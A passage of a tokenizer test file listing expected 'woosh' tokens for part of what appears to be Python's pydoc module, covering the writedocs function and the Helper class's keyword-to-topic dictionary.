woosh.Token(woosh.OP, '(', 1789, 24, 1789, 25),
woosh.Token(woosh.NAME, 'describe', 1789, 25, 1789, 33),
woosh.Token(woosh.OP, '(', 1789, 33, 1789, 34),
woosh.Token(woosh.NAME, 'object', 1789, 34, 1789, 40),
woosh.Token(woosh.OP, ')', 1789, 40, 1789, 41),
woosh.Token(woosh.OP, ',', 1789, 41, 1789, 42),
woosh.Token(woosh.NAME, 'html', 1789, 43, 1789, 47),
woosh.Token(woosh.OP, '.', 1789, 47, 1789, 48),
woosh.Token(woosh.NAME, 'document', 1789, 48, 1789, 56),
woosh.Token(woosh.OP, '(', 1789, 56, 1789, 57),
woosh.Token(woosh.NAME, 'object', 1789, 57, 1789, 63),
woosh.Token(woosh.OP, ',', 1789, 63, 1789, 64),
woosh.Token(woosh.NAME, 'name', 1789, 65, 1789, 69),
woosh.Token(woosh.OP, ')', 1789, 69, 1789, 70),
woosh.Token(woosh.OP, ')', 1789, 70, 1789, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1789, 71, 1790, 0),
woosh.Token(woosh.NAME, 'with', 1790, 8, 1790, 12),
woosh.Token(woosh.NAME, 'open', 1790, 13, 1790, 17),
woosh.Token(woosh.OP, '(', 1790, 17, 1790, 18),
woosh.Token(woosh.NAME, 'name', 1790, 18, 1790, 22),
woosh.Token(woosh.OP, '+', 1790, 23, 1790, 24),
woosh.Token(woosh.STRING, "'.html'", 1790, 25, 1790, 32),
woosh.Token(woosh.OP, ',', 1790, 32, 1790, 33),
woosh.Token(woosh.STRING, "'w'", 1790, 34, 1790, 37),
woosh.Token(woosh.OP, ',', 1790, 37, 1790, 38),
woosh.Token(woosh.NAME, 'encoding', 1790, 39, 1790, 47),
woosh.Token(woosh.OP, '=', 1790, 47, 1790, 48),
woosh.Token(woosh.STRING, "'utf-8'", 1790, 48, 1790, 55),
woosh.Token(woosh.OP, ')', 1790, 55, 1790, 56),
woosh.Token(woosh.NAME, 'as', 1790, 57, 1790, 59),
woosh.Token(woosh.NAME, 'file', 1790, 60, 1790, 64),
woosh.Token(woosh.OP, ':', 1790, 64, 1790, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1790, 65, 1791, 0),
woosh.Token(woosh.INDENT, ' ', 1791, 0, 1791, 12),
woosh.Token(woosh.NAME, 'file', 1791, 12, 1791, 16),
woosh.Token(woosh.OP, '.', 1791, 16, 1791, 17),
woosh.Token(woosh.NAME, 'write', 1791, 17, 1791, 22),
woosh.Token(woosh.OP, '(', 1791, 22, 1791, 23),
woosh.Token(woosh.NAME, 'page', 1791, 23, 1791, 27),
woosh.Token(woosh.OP, ')', 1791, 27, 1791, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1791, 28, 1792, 0),
woosh.Token(woosh.DEDENT, ' ', 1792, 0, 1792, 8),
woosh.Token(woosh.NAME, 'print', 1792, 8, 1792, 13),
woosh.Token(woosh.OP, '(', 1792, 13, 1792, 14),
woosh.Token(woosh.STRING, "'wrote'", 1792, 14, 1792, 21),
woosh.Token(woosh.OP, ',', 1792, 21, 1792, 22),
woosh.Token(woosh.NAME, 'name', 1792, 23, 1792, 27),
woosh.Token(woosh.OP, '+', 1792, 28, 1792, 29),
woosh.Token(woosh.STRING, "'.html'", 1792, 30, 1792, 37),
woosh.Token(woosh.OP, ')', 1792, 37, 1792, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1792, 38, 1793, 0),
woosh.Token(woosh.DEDENT, ' ', 1793, 0, 1793, 4),
woosh.Token(woosh.NAME, 'except', 1793, 4, 1793, 10),
woosh.Token(woosh.OP, '(', 1793, 11, 1793, 12),
woosh.Token(woosh.NAME, 'ImportError', 1793, 12, 1793, 23),
woosh.Token(woosh.OP, ',', 1793, 23, 1793, 24),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 1793, 25, 1793, 42),
woosh.Token(woosh.OP, ')', 1793, 42, 1793, 43),
woosh.Token(woosh.NAME, 'as', 1793, 44, 1793, 46),
woosh.Token(woosh.NAME, 'value', 1793, 47, 1793, 52),
woosh.Token(woosh.OP, ':', 1793, 52, 1793, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1793, 53, 1794, 0),
woosh.Token(woosh.INDENT, ' ', 1794, 0, 1794, 8),
woosh.Token(woosh.NAME, 'print', 1794, 8, 1794, 13),
woosh.Token(woosh.OP, '(', 1794, 13, 1794, 14),
woosh.Token(woosh.NAME, 'value', 1794, 14, 1794, 19),
woosh.Token(woosh.OP, ')', 1794, 19, 1794, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1794, 20, 1795, 0),
woosh.Token(woosh.DEDENT, '', 1796, 0, 1796, 0),
woosh.Token(woosh.DEDENT, '', 1796, 0, 1796, 0),
woosh.Token(woosh.NAME, 'def', 1796, 0, 1796, 3),
woosh.Token(woosh.NAME, 'writedocs', 1796, 4, 1796, 13),
woosh.Token(woosh.OP, '(', 1796, 13, 1796, 14),
woosh.Token(woosh.NAME, 'dir', 1796, 14, 1796, 17),
woosh.Token(woosh.OP, ',', 1796, 17, 1796, 18),
woosh.Token(woosh.NAME, 'pkgpath', 1796, 19, 1796, 26),
woosh.Token(woosh.OP, '=', 1796, 26, 1796, 27),
woosh.Token(woosh.STRING, "''", 1796, 27, 1796, 29),
woosh.Token(woosh.OP, ',', 1796, 29, 1796, 30),
woosh.Token(woosh.NAME, 'done', 1796, 31, 1796, 35),
woosh.Token(woosh.OP, '=', 1796, 35, 1796, 36),
woosh.Token(woosh.NAME, 'None', 1796, 36, 1796, 40),
woosh.Token(woosh.OP, ')', 1796, 40, 1796, 41),
woosh.Token(woosh.OP, ':', 1796, 41, 1796, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1796, 42, 1797, 0),
woosh.Token(woosh.INDENT, ' ', 1797, 0, 1797, 4),
woosh.Token(woosh.STRING, '"""Write out HTML documentation for all modules in a directory tree."""', 1797, 4, 1797, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1797, 75, 1798, 0),
woosh.Token(woosh.NAME, 'if', 1798, 4, 1798, 6),
woosh.Token(woosh.NAME, 'done', 1798, 7, 1798, 11),
woosh.Token(woosh.NAME, 'is', 1798, 12, 1798, 14),
woosh.Token(woosh.NAME, 'None', 1798, 15, 1798, 19),
woosh.Token(woosh.OP, ':', 1798, 19, 1798, 20),
woosh.Token(woosh.NAME, 'done', 1798, 21, 1798, 25),
woosh.Token(woosh.OP, '=', 1798, 26, 1798, 27),
woosh.Token(woosh.OP, '{', 1798, 28, 1798, 29),
woosh.Token(woosh.OP, '}', 1798, 29, 1798, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1798, 30, 1799, 0),
woosh.Token(woosh.NAME, 'for', 1799, 4, 1799, 7),
woosh.Token(woosh.NAME, 'importer', 1799, 8, 1799, 16),
woosh.Token(woosh.OP, ',', 1799, 16, 1799, 17),
woosh.Token(woosh.NAME, 'modname', 1799, 18, 1799, 25),
woosh.Token(woosh.OP, ',', 1799, 25, 1799, 26),
woosh.Token(woosh.NAME, 'ispkg', 1799, 27, 1799, 32),
woosh.Token(woosh.NAME, 'in', 1799, 33, 1799, 35),
woosh.Token(woosh.NAME, 'pkgutil', 1799, 36, 1799, 43),
woosh.Token(woosh.OP, '.', 1799, 43, 1799, 44),
woosh.Token(woosh.NAME, 'walk_packages', 1799, 44, 1799, 57),
woosh.Token(woosh.OP, '(', 1799, 57, 1799, 58),
woosh.Token(woosh.OP, '[', 1799, 58, 1799, 59),
woosh.Token(woosh.NAME, 'dir', 1799, 59, 1799, 62),
woosh.Token(woosh.OP, ']', 1799, 62, 1799, 63),
woosh.Token(woosh.OP, ',', 1799, 63, 1799, 64),
woosh.Token(woosh.NAME, 'pkgpath', 1799, 65, 1799, 72),
woosh.Token(woosh.OP, ')', 1799, 72, 1799, 73),
woosh.Token(woosh.OP, ':', 1799, 73, 1799, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1799, 74, 1800, 0),
woosh.Token(woosh.INDENT, ' ', 1800, 0, 1800, 8),
woosh.Token(woosh.NAME, 'writedoc', 1800, 8, 1800, 16),
woosh.Token(woosh.OP, '(', 1800, 16, 1800, 17),
woosh.Token(woosh.NAME, 'modname', 1800, 17, 1800, 24),
woosh.Token(woosh.OP, ')', 1800, 24, 1800, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1800, 25, 1801, 0),
woosh.Token(woosh.DEDENT, ' ', 1801, 0, 1801, 4),
woosh.Token(woosh.NAME, 'return', 1801, 4, 1801, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 1801, 10, 1802, 0),
woosh.Token(woosh.DEDENT, '', 1803, 0, 1803, 0),
woosh.Token(woosh.NAME, 'class', 1803, 0, 1803, 5),
woosh.Token(woosh.NAME, 'Helper', 1803, 6, 1803, 12),
woosh.Token(woosh.OP, ':', 1803, 12, 1803, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1803, 13, 1804, 0),
woosh.Token(woosh.COMMENT, '# These dictionaries map a topic name to either an alias, or a tuple', 1805, 4, 1805, 72),
woosh.Token(woosh.COMMENT, '# (label, seealso-items). The "label" is the label of the corresponding', 1806, 4, 1806, 76),
woosh.Token(woosh.COMMENT, '# section in the .rst file under Doc/ and an index into the dictionary', 1807, 4, 1807, 74),
woosh.Token(woosh.COMMENT, '# in pydoc_data/topics.py.', 1808, 4, 1808, 30),
woosh.Token(woosh.COMMENT, '#', 1809, 4, 1809, 5),
woosh.Token(woosh.COMMENT, '# CAUTION: if you change one of these dictionaries, be sure to adapt the', 1810, 4, 1810, 76),
woosh.Token(woosh.COMMENT, '# list of needed labels in Doc/tools/extensions/pyspecific.py and', 1811, 4, 1811, 78),
woosh.Token(woosh.COMMENT, '# regenerate the pydoc_data/topics.py file by running', 1812, 4, 1812, 66),
woosh.Token(woosh.COMMENT, '# make pydoc-topics', 1813, 4, 1813, 36),
woosh.Token(woosh.COMMENT, '# in Doc/ and copying the output file into the Lib/ directory.', 1814, 4, 1814, 75),
woosh.Token(woosh.INDENT, ' ', 1816, 0, 1816, 4),
woosh.Token(woosh.NAME, 'keywords', 1816, 4, 1816, 12),
woosh.Token(woosh.OP, '=', 1816, 13, 1816, 14),
woosh.Token(woosh.OP, '{', 1816, 15, 1816, 16),
woosh.Token(woosh.STRING, "'False'", 1817, 8, 1817, 15),
woosh.Token(woosh.OP, ':', 1817, 15, 1817, 16),
woosh.Token(woosh.STRING, "''", 1817, 17, 1817, 19),
woosh.Token(woosh.OP, ',', 1817, 19, 1817, 20),
woosh.Token(woosh.STRING, "'None'", 1818, 8, 1818, 14),
woosh.Token(woosh.OP, ':', 1818, 14, 1818, 15),
woosh.Token(woosh.STRING, "''", 1818, 16, 1818, 18),
woosh.Token(woosh.OP, ',', 1818, 18, 1818, 19),
woosh.Token(woosh.STRING, "'True'", 1819, 8, 1819, 14),
woosh.Token(woosh.OP, ':', 1819, 14, 1819, 15),
woosh.Token(woosh.STRING, "''", 1819, 16, 1819, 18),
woosh.Token(woosh.OP, ',', 1819, 18, 1819, 19),
woosh.Token(woosh.STRING, "'and'", 1820, 8, 1820, 13),
woosh.Token(woosh.OP, ':', 1820, 13, 1820, 14),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1820, 15, 1820, 24),
woosh.Token(woosh.OP, ',', 1820, 24, 1820, 25),
woosh.Token(woosh.STRING, "'as'", 1821, 8, 1821, 12),
woosh.Token(woosh.OP, ':', 1821, 12, 1821, 13),
woosh.Token(woosh.STRING, "'with'", 1821, 14, 1821, 20),
woosh.Token(woosh.OP, ',', 1821, 20, 1821, 21),
woosh.Token(woosh.STRING, "'assert'", 1822, 8, 1822, 16),
woosh.Token(woosh.OP, ':', 1822, 16, 1822, 17),
woosh.Token(woosh.OP, '(', 1822, 18, 1822, 19),
woosh.Token(woosh.STRING, "'assert'", 1822, 19, 1822, 27),
woosh.Token(woosh.OP, ',', 1822, 27, 1822, 28),
woosh.Token(woosh.STRING, "''", 1822, 29, 1822, 31),
woosh.Token(woosh.OP, ')', 1822, 31, 1822, 32),
woosh.Token(woosh.OP, ',', 1822, 32, 1822, 33),
woosh.Token(woosh.STRING, "'async'", 1823, 8, 1823, 15),
woosh.Token(woosh.OP, ':', 1823, 15, 1823, 16),
woosh.Token(woosh.OP, '(', 1823, 17, 1823, 18),
woosh.Token(woosh.STRING, "'async'", 1823, 18, 1823, 25),
woosh.Token(woosh.OP, ',', 1823, 25, 1823, 26),
woosh.Token(woosh.STRING, "''", 1823, 27, 1823, 29),
woosh.Token(woosh.OP, ')', 1823, 29, 1823, 30),
woosh.Token(woosh.OP, ',', 1823, 30, 1823, 31),
woosh.Token(woosh.STRING, "'await'", 1824, 8, 1824, 15),
woosh.Token(woosh.OP, ':', 1824, 15, 1824, 16),
woosh.Token(woosh.OP, '(', 1824, 17, 1824, 18),
woosh.Token(woosh.STRING, "'await'", 1824, 18, 1824, 25),
woosh.Token(woosh.OP, ',', 1824, 25, 1824, 26),
woosh.Token(woosh.STRING, "''", 1824, 27, 1824, 29),
woosh.Token(woosh.OP, ')', 1824, 29, 1824, 30),
woosh.Token(woosh.OP, ',', 1824, 30, 1824, 31),
woosh.Token(woosh.STRING, "'break'", 1825, 8, 1825, 15),
woosh.Token(woosh.OP, ':', 1825, 15, 1825, 16),
woosh.Token(woosh.OP, '(', 1825, 17, 1825, 18),
woosh.Token(woosh.STRING, "'break'", 1825, 18, 1825, 25),
woosh.Token(woosh.OP, ',', 1825, 25, 1825, 26),
woosh.Token(woosh.STRING, "'while for'", 1825, 27, 1825, 38),
woosh.Token(woosh.OP, ')', 1825, 38, 1825, 39),
woosh.Token(woosh.OP, ',', 1825, 39, 1825, 40),
woosh.Token(woosh.STRING, "'class'", 1826, 8, 1826, 15),
woosh.Token(woosh.OP, ':', 1826, 15, 1826, 16),
woosh.Token(woosh.OP, '(', 1826, 17, 1826, 18),
woosh.Token(woosh.STRING, "'class'", 1826, 18, 1826, 25),
woosh.Token(woosh.OP, ',', 1826, 25, 1826, 26),
woosh.Token(woosh.STRING, "'CLASSES SPECIALMETHODS'", 1826, 27, 1826, 51),
woosh.Token(woosh.OP, ')', 1826, 51, 1826, 52),
woosh.Token(woosh.OP, ',', 1826, 52, 1826, 53),
woosh.Token(woosh.STRING, "'continue'", 1827, 8, 1827, 18),
woosh.Token(woosh.OP, ':', 1827, 18, 1827, 19),
woosh.Token(woosh.OP, '(', 1827, 20, 1827, 21),
woosh.Token(woosh.STRING, "'continue'", 1827, 21, 1827, 31),
woosh.Token(woosh.OP, ',', 1827, 31, 1827, 32),
woosh.Token(woosh.STRING, "'while for'", 1827, 33, 1827, 44),
woosh.Token(woosh.OP, ')', 1827, 44, 1827, 45),
woosh.Token(woosh.OP, ',', 1827, 45, 1827, 46),
woosh.Token(woosh.STRING, "'def'", 1828, 8, 1828, 13),
woosh.Token(woosh.OP, ':', 1828, 13, 1828, 14),
woosh.Token(woosh.OP, '(', 1828, 15, 1828, 16),
woosh.Token(woosh.STRING, "'function'", 1828, 16, 1828, 26),
woosh.Token(woosh.OP, ',', 1828, 26, 1828, 27),
woosh.Token(woosh.STRING, "''", 1828, 28, 1828, 30),
woosh.Token(woosh.OP, ')', 1828, 30, 1828, 31),
woosh.Token(woosh.OP, ',', 1828, 31, 1828, 32),
woosh.Token(woosh.STRING, "'del'", 1829, 8, 1829, 13),
woosh.Token(woosh.OP, ':', 1829, 13, 1829, 14),
woosh.Token(woosh.OP, '(', 1829, 15, 1829, 16),
woosh.Token(woosh.STRING, "'del'", 1829, 16, 1829, 21),
woosh.Token(woosh.OP, ',', 1829, 21, 1829, 22),
woosh.Token(woosh.STRING, "'BASICMETHODS'", 1829, 23, 1829, 37),
woosh.Token(woosh.OP, ')', 1829, 37, 1829, 38),
woosh.Token(woosh.OP, ',', 1829, 38, 1829, 39),
woosh.Token(woosh.STRING, "'elif'", 1830, 8, 1830, 14),
woosh.Token(woosh.OP, ':', 1830, 14, 1830, 15),
woosh.Token(woosh.STRING, "'if'", 1830, 16, 1830, 20),
woosh.Token(woosh.OP, ',', 1830, 20, 1830, 21),
woosh.Token(woosh.STRING, "'else'", 1831, 8, 1831, 14),
woosh.Token(woosh.OP, ':', 1831, 14, 1831, 15),
woosh.Token(woosh.OP, '(', 1831, 16, 1831, 17),
woosh.Token(woosh.STRING, "'else'", 1831, 17, 1831, 23),
woosh.Token(woosh.OP, ',', 1831, 23, 1831, 24),
woosh.Token(woosh.STRING, "'while for'", 1831, 25, 1831, 36),
woosh.Token(woosh.OP, ')', 1831, 36, 1831, 37),
woosh.Token(woosh.OP, ',', 1831, 37, 1831, 38),
woosh.Token(woosh.STRING, "'except'", 1832, 8, 1832, 16),
woosh.Token(woosh.OP, ':', 1832, 16, 1832, 17),
woosh.Token(woosh.STRING, "'try'", 1832, 18, 1832, 23),
woosh.Token(woosh.OP, ',', 1832, 23, 1832, 24),
woosh.Token(woosh.STRING, "'finally'", 1833, 8, 1833, 17),
woosh.Token(woosh.OP, ':', 1833, 17, 1833, 18),
woosh.Token(woosh.STRING, "'try'", 1833, 19, 1833, 24),
woosh.Token(woosh.OP, ',', 1833, 24, 1833, 25),
woosh.Token(woosh.STRING, "'for'", 1834, 8, 1834, 13),
woosh.Token(woosh.OP, ':', 1834, 13, 1834, 14),
woosh.Token(woosh.OP, '(', 1834, 15, 1834, 16),
woosh.Token(woosh.STRING, "'for'", 1834, 16, 1834, 21),
woosh.Token(woosh.OP, ',', 1834, 21, 1834, 22),
woosh.Token(woosh.STRING, "'break continue while'", 1834, 23, 1834, 45),
woosh.Token(woosh.OP, ')', 1834, 45, 1834, 46),
woosh.Token(woosh.OP, ',', 1834, 46, 1834, 47),
woosh.Token(woosh.STRING, "'from'", 1835, 8, 1835, 14),
woosh.Token(woosh.OP, ':', 1835, 14, 1835, 15),
woosh.Token(woosh.STRING, "'import'", 1835, 16, 1835, 24),
woosh.Token(woosh.OP, ',', 1835, 24, 1835, 25),
woosh.Token(woosh.STRING, "'global'", 1836, 8, 1836, 16),
woosh.Token(woosh.OP, ':', 1836, 16, 1836, 17),
woosh.Token(woosh.OP, '(', 1836, 18, 1836, 19),
woosh.Token(woosh.STRING, "'global'", 1836, 19, 1836, 27),
woosh.Token(woosh.OP, ',', 1836, 27, 1836, 28),
woosh.Token(woosh.STRING, "'nonlocal NAMESPACES'", 1836, 29, 1836, 50),
woosh.Token(woosh.OP, ')', 1836, 50, 1836, 51),
woosh.Token(woosh.OP, ',', 1836, 51, 1836, 52),
woosh.Token(woosh.STRING, "'if'", 1837, 8, 1837, 12),
woosh.Token(woosh.OP, ':', 1837, 12, 1837, 13),
woosh.Token(woosh.OP, '(', 1837, 14, 1837, 15),
woosh.Token(woosh.STRING, "'if'", 1837, 15, 1837, 19),
woosh.Token(woosh.OP, ',', 1837, 19, 1837, 20),
woosh.Token(woosh.STRING, "'TRUTHVALUE'", 1837, 21, 1837, 33),
woosh.Token(woosh.OP, ')', 1837, 33, 1837, 34),
woosh.Token(woosh.OP, ',', 1837, 34, 1837, 35),
woosh.Token(woosh.STRING, "'import'", 1838, 8, 1838, 16),
woosh.Token(woosh.OP, ':', 1838, 16, 1838, 17),
woosh.Token(woosh.OP, '(', 1838, 18, 1838, 19),
woosh.Token(woosh.STRING, "'import'", 1838, 19, 1838, 27),
woosh.Token(woosh.OP, ',', 1838, 27, 1838, 28),
woosh.Token(woosh.STRING, "'MODULES'", 1838, 29, 1838, 38),
woosh.Token(woosh.OP, ')', 1838, 38, 1838, 39),
woosh.Token(woosh.OP, ',', 1838, 39, 1838, 40),
woosh.Token(woosh.STRING, "'in'", 1839, 8, 1839, 12),
woosh.Token(woosh.OP, ':', 1839, 12, 1839, 13),
woosh.Token(woosh.OP, '(', 1839, 14, 1839, 15),
woosh.Token(woosh.STRING, "'in'", 1839, 15, 1839, 19),
woosh.Token(woosh.OP, ',', 1839, 19, 1839, 20),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1839, 21, 1839, 38),
woosh.Token(woosh.OP, ')', 1839, 38, 1839, 39),
woosh.Token(woosh.OP, ',', 1839, 39, 1839, 40),
woosh.Token(woosh.STRING, "'is'", 1840, 8, 1840, 12),
woosh.Token(woosh.OP, ':', 1840, 12, 1840, 13),
woosh.Token(woosh.STRING, "'COMPARISON'", 1840, 14, 1840, 26),
woosh.Token(woosh.OP, ',', 1840, 26, 1840, 27),
woosh.Token(woosh.STRING, "'lambda'", 1841, 8, 1841, 16),
woosh.Token(woosh.OP, ':', 1841, 16, 1841, 17),
woosh.Token(woosh.OP, '(', 1841, 18, 1841, 19),
woosh.Token(woosh.STRING, "'lambda'", 1841, 19, 1841, 27),
woosh.Token(woosh.OP, ',', 1841, 27, 1841, 28),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1841, 29, 1841, 40),
woosh.Token(woosh.OP, ')', 1841, 40, 1841, 41),
woosh.Token(woosh.OP, ',', 1841, 41, 1841, 42),
woosh.Token(woosh.STRING, "'nonlocal'", 1842, 8, 1842, 18),
woosh.Token(woosh.OP, ':', 1842, 18, 1842, 19),
woosh.Token(woosh.OP, '(', 1842, 20, 1842, 21),
woosh.Token(woosh.STRING, "'nonlocal'", 1842, 21, 1842, 31),
woosh.Token(woosh.OP, ',', 1842, 31, 1842, 32),
woosh.Token(woosh.STRING, "'global NAMESPACES'", 1842, 33, 1842, 52),
woosh.Token(woosh.OP, ')', 1842, 52, 1842, 53),
woosh.Token(woosh.OP, ',', 1842, 53, 1842, 54),
woosh.Token(woosh.STRING, "'not'", 1843, 8, 1843, 13),
woosh.Token(woosh.OP, ':', 1843, 13, 1843, 14),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1843, 15, 1843, 24),
woosh.Token(woosh.OP, ',', 1843, 24, 1843, 25),
woosh.Token(woosh.STRING, "'or'", 1844, 8, 1844, 12),
woosh.Token(woosh.OP, ':', 1844, 12, 1844, 13),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1844, 14, 1844, 23),
woosh.Token(woosh.OP, ',', 1844, 23, 1844, 24),
woosh.Token(woosh.STRING, "'pass'", 1845, 8, 1845, 14),
woosh.Token(woosh.OP, ':', 1845, 14, 1845, 15),
woosh.Token(woosh.OP, '(', 1845, 16, 1845, 17),
woosh.Token(woosh.STRING, "'pass'", 1845, 17, 1845, 23),
woosh.Token(woosh.OP, ',', 1845, 23, 1845, 24),
woosh.Token(woosh.STRING, "''", 1845, 25, 1845, 27),
woosh.Token(woosh.OP, ')', 1845, 27, 1845, 28),
woosh.Token(woosh.OP, ',', 1845, 28, 1845, 29),
woosh.Token(woosh.STRING, "'raise'", 1846, 8, 1846, 15),
woosh.Token(woosh.OP, ':', 1846, 15, 1846, 16),
woosh.Token(woosh.OP, '(', 1846, 17, 1846, 18),
woosh.Token(woosh.STRING, "'raise'", 1846, 18, 1846, 25),
woosh.Token(woosh.OP, ',', 1846, 25, 1846, 26),
woosh.Token(woosh.STRING, "'EXCEPTIONS'", 1846, 27, 1846, 39),
woosh.Token(woosh.OP, ')', 1846, 39, 1846, 40),
woosh.Token(woosh.OP, ',', 1846, 40, 1846, 41),
woosh.Token(woosh.STRING, "'return'", 1847, 8, 1847, 16),
woosh.Token(woosh.OP, ':', 1847, 16, 1847, 17),
woosh.Token(woosh.OP, '(', 1847, 18, 1847, 19),
woosh.Token(woosh.STRING, "'return'", 1847, 19, 1847, 27),
woosh.Token(woosh.OP, ',', 1847, 27, 1847, 28),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1847, 29, 1847, 40),
woosh.Token(woosh.OP, ')', 1847, 40, 1847, 41),
woosh.Token(woosh.OP, ',', 1847, 41, 1847, 42),
woosh.Token(woosh.STRING, "'try'", 1848, 8, 1848, 13),
woosh.Token(woosh.OP, ':', 1848, 13, 1848, 14),
woosh.Token(woosh.OP, '(', 1848, 15, 1848, 16),
woosh.Token(woosh.STRING, "'try'", 1848, 16, 1848, 21),
woosh.Token(woosh.OP, ',', 1848, 21, 1848, 22),
woosh.Token(woosh.STRING, "'EXCEPTIONS'", 1848, 23, 1848, 35),
woosh.Token(woosh.OP, ')', 1848, 35, 1848, 36),
woosh.Token(woosh.OP, ',', 1848, 36, 1848, 37),
woosh.Token(woosh.STRING, "'while'", 1849, 8, 1849, 15),
woosh.Token(woosh.OP, ':', 1849, 15, 1849, 16),
woosh.Token(woosh.OP, '(', 1849, 17, 1849, 18),
woosh.Token(woosh.STRING, "'while'", 1849, 18, 1849, 25),
woosh.Token(woosh.OP, ',', 1849, 25, 1849, 26),
woosh.Token(woosh.STRING, "'break continue if TRUTHVALUE'", 1849, 27, 1849, 57),
woosh.Token(woosh.OP, ')', 1849, 57, 1849, 58),
woosh.Token(woosh.OP, ',', 1849, 58, 1849, 59),
woosh.Token(woosh.STRING, "'with'", 1850, 8, 1850, 14),
woosh.Token(woosh.OP, ':', 1850, 14, 1850, 15),
woosh.Token(woosh.OP, '(', 1850, 16, 1850, 17),
woosh.Token(woosh.STRING, "'with'", 1850, 17, 1850, 23),
woosh.Token(woosh.OP, ',', 1850, 23, 1850, 24),
woosh.Token(woosh.STRING, "'CONTEXTMANAGERS EXCEPTIONS yield'", 1850, 25, 1850, 59),
woosh.Token(woosh.OP, ')', 1850, 59, 1850, 60),
woosh.Token(woosh.OP, ',', 1850, 60, 1850, 61),
woosh.Token(woosh.STRING, "'yield'", 1851, 8, 1851, 15),
woosh.Token(woosh.OP, ':', 1851, 15, 1851, 16),
woosh.Token(woosh.OP, '(', 1851, 17, 1851, 18),
woosh.Token(woosh.STRING, "'yield'", 1851, 18, 1851, 25),
woosh.Token(woosh.OP, ',', 1851, 25, 1851, 26),
woosh.Token(woosh.STRING, "''", 1851, 27, 1851, 29),
woosh.Token(woosh.OP, ')', 1851, 29, 1851, 30),
woosh.Token(woosh.OP, ',', 1851, 30, 1851, 31),
woosh.Token(woosh.OP, '}', 1852, 4, 1852, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1852, 5, 1853, 0),
woosh.Token(woosh.COMMENT, '# Either add symbols to this dictionary or to the symbols dictionary', 1853, 4, 1853, 72),
woosh.Token(woosh.COMMENT, '# directly: Whichever is easier. They are merged later.', 1854, 4, 1854, 59),
woosh.Token(woosh.NAME, '_strprefixes', 1855, 4, 1855, 16),
woosh.Token(woosh.OP, '=', 1855, 17, 1855, 18),
woosh.Token(woosh.OP, '[', 1855, 19, 1855, 20),
woosh.Token(woosh.NAME, 'p', 1855, 20, 1855, 21),
woosh.Token(woosh.OP, '+', 1855, 22, 1855, 23),
woosh.Token(woosh.NAME, 'q', 1855, 24, 1855, 25),
woosh.Token(woosh.NAME, 'for', 1855, 26, 1855, 29),
woosh.Token(woosh.NAME, 'p', 1855, 30, 1855, 31),
woosh.Token(woosh.NAME, 'in', 1855, 32, 1855, 34),
woosh.Token(woosh.OP, '(', 1855, 35, 1855, 36),
woosh.Token(woosh.STRING, "'b'", 1855, 36, 1855, 39),
woosh.Token(woosh.OP, ',', 1855, 39, 1855, 40),
woosh.Token(woosh.STRING, "'f'", 1855, 41, 1855, 44),
woosh.Token(woosh.OP, ',', 1855, 44, 1855, 45),
woosh.Token(woosh.STRING, "'r'", 1855, 46, 1855, 49),
woosh.Token(woosh.OP, ',', 1855, 49, 1855, 50),
woosh.Token(woosh.STRING, "'u'", 1855, 51, 1855, 54),
woosh.Token(woosh.OP, ')', 1855, 54, 1855, 55),
woosh.Token(woosh.NAME, 'for', 1855, 56, 1855, 59),
woosh.Token(woosh.NAME, 'q', 1855, 60, 1855, 61),
woosh.Token(woosh.NAME, 'in', 1855, 62, 1855, 64),
woosh.Token(woosh.OP, '(', 1855, 65, 1855, 66),
woosh.Token(woosh.STRING, '"\'"', 1855, 66, 1855, 69),
woosh.Token(woosh.OP, ',', 1855, 69, 1855, 70),
woosh.Token(woosh.STRING, '\'"\'', 1855, 71, 1855, 74),
woosh.Token(woosh.OP, ')', 1855, 74, 1855, 75),
woosh.Token(woosh.OP, ']', 1855, 75, 1855, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1855, 76, 1856, 0),
woosh.Token(woosh.NAME, '_symbols_inverse', 1856, 4, 1856, 20),
woosh.Token(woosh.OP, '=', 1856, 21, 1856, 22),
woosh.Token(woosh.OP, '{', 1856, 23, 1856, 24),
woosh.Token(woosh.STRING, "'STRINGS'", 1857, 8, 1857, 17),
woosh.Token(woosh.OP, ':', 1857, 18, 1857, 19),
woosh.Token(woosh.OP, '(', 1857, 20, 1857, 21),
woosh.Token(woosh.STRING, '"\'"', 1857, 21, 1857, 24),
woosh.Token(woosh.OP, ',', 1857, 24, 1857, 25),
woosh.Token(woosh.STRING, '"\'\'\'"', 1857, 26, 1857, 31),
woosh.Token(woosh.OP, ',', 1857, 31, 1857, 32),
woosh.Token(woosh.STRING, '\'"\'', 1857, 33, 1857, 36),
woosh.Token(woosh.OP, ',', 1857, 36, 1857, 37),
woosh.Token(woosh.STRING, '\'"""\'', 1857, 38, 1857, 43),
woosh.Token(woosh.OP, ',', 1857, 43, 1857, 44),
woosh.Token(woosh.OP, '*', 1857, 45, 1857, 46),
woosh.Token(woosh.NAME, '_strprefixes', 1857, 46, 1857, 58),
woosh.Token(woosh.OP, ')', 1857, 58, 1857, 59),
woosh.Token(woosh.OP, ',', 1857, 59, 1857, 60),
woosh.Token(woosh.STRING, "'OPERATORS'", 1858, 8, 1858, 19),
woosh.Token(woosh.OP, ':', 1858, 20, 1858, 21),
woosh.Token(woosh.OP, '(', 1858, 22, 1858, 23),
woosh.Token(woosh.STRING, "'+'", 1858, 23, 1858, 26),
woosh.Token(woosh.OP, ',', 1858, 26, 1858, 27),
woosh.Token(woosh.STRING, "'-'", 1858, 28, 1858, 31),
